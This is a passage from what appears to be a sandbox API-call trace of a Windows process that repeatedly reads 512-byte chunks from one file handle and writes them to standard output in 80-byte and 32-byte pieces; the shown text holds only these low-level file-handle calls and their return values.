lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] GetFileType (hFile=0x50) returned 0x1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] GetFileType (hFile=0x50) returned 0x1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] GetFileType (hFile=0x50) returned 0x1 [0209.471] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.471] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.471] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.471] GetFileType (hFile=0x50) returned 0x1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] GetFileType (hFile=0x50) returned 0x1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: 
lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.472] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.472] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.472] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.472] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] GetFileType (hFile=0x50) returned 0x1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] GetFileType (hFile=0x50) returned 0x1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] GetFileType (hFile=0x50) returned 0x1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] GetFileType (hFile=0x50) returned 0x1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] GetFileType (hFile=0x50) returned 0x1 [0209.473] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0209.473] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] GetFileType (hFile=0x50) returned 0x1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] GetFileType (hFile=0x50) returned 0x1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] GetFileType (hFile=0x50) returned 0x1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.473] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.473] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] 
GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 
[0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] GetFileType (hFile=0x50) returned 0x1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.475] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.475] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] GetFileType (hFile=0x50) returned 0x1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] GetFileType (hFile=0x50) returned 0x1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] GetFileType (hFile=0x50) returned 0x1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] GetFileType (hFile=0x50) returned 0x1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] GetFileType (hFile=0x50) returned 0x1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] GetFileType (hFile=0x50) returned 0x1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] GetFileType (hFile=0x50) returned 0x1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] GetFileType (hFile=0x50) returned 0x1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.476] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.476] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.476] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.476] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] GetFileType (hFile=0x50) returned 0x1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] GetFileType (hFile=0x50) returned 0x1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] GetFileType (hFile=0x50) returned 0x1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] GetFileType (hFile=0x50) returned 0x1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] GetFileType 
(hFile=0x50) returned 0x1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] GetFileType (hFile=0x50) returned 0x1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] GetFileType (hFile=0x50) returned 0x1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] GetFileType (hFile=0x50) returned 0x1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.478] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.478] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.478] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] GetFileType (hFile=0x50) returned 0x1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] GetFileType (hFile=0x50) returned 0x1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] GetFileType (hFile=0x50) returned 0x1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] GetFileType (hFile=0x50) returned 0x1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] GetFileType (hFile=0x50) returned 0x1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] GetFileType (hFile=0x50) returned 0x1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, 
lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] GetFileType (hFile=0x50) returned 0x1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] GetFileType (hFile=0x50) returned 0x1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.479] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.479] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.480] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.480] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] GetFileType (hFile=0x50) returned 0x1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] GetFileType (hFile=0x50) returned 0x1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] GetFileType (hFile=0x50) returned 0x1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 
[0209.480] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] GetFileType (hFile=0x50) returned 0x1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] GetFileType (hFile=0x50) returned 0x1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] GetFileType (hFile=0x50) returned 0x1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] GetFileType (hFile=0x50) returned 0x1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] GetFileType (hFile=0x50) returned 0x1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] WriteFile (in: hFile=0x50, 
lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.481] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.481] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.481] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.481] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] GetFileType (hFile=0x50) returned 0x1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] GetFileType (hFile=0x50) returned 0x1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] GetFileType (hFile=0x50) returned 0x1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] GetFileType (hFile=0x50) returned 0x1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.482] _get_osfhandle 
